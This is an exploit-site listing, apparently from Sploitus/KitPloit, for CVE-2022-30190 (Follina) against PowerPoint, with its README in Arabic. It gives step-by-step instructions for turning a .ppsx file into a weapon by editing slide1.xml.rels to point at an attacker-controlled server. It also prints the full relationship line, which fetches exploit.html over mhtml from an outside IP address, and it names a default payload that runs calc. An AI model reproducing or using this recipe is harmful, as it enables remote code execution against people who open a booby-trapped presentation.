Sploitus

Exploit for CVE-2022-30190_EXP_PowerPoint

kitploit · 2026-08-28

Exploit Code

MARKDOWN14 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-GRA3S-CVE-2022-30190_EXP_POWERPOINT
# CVE-2022-30190_EXP_PowerPoint

هذا هو استغلال ثغرة CVE-2022-30190 على PowerPoint.

قم بتعديل لاحقة الملف إلى 'zip' وفك ضغط الملف، يمكنك تعديل `\ppt\slides\_rels\slide1.xml.rels` واستبدالها بعنوان ip:port الخاص بخادمك الافتراضي (VPS) مثل هذا، ثم أعد ضغطها بنفس الطريقة وغيّر اللاحقة إلى 'ppsx'. الحمولة الافتراضية في 'exploit.html' هي تنفيذ الأمر `calc`.

root@kitploit:~
    
    
    <Relationship TargetMode="External" Id="rId3"  Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"  Target="mhtml:http://114.114.114.114:80/exploit.html!x-usc:http://114.114.114.114:80/exploit.html"/>
    

المرجع: https://github.com/chvancooten/follina.py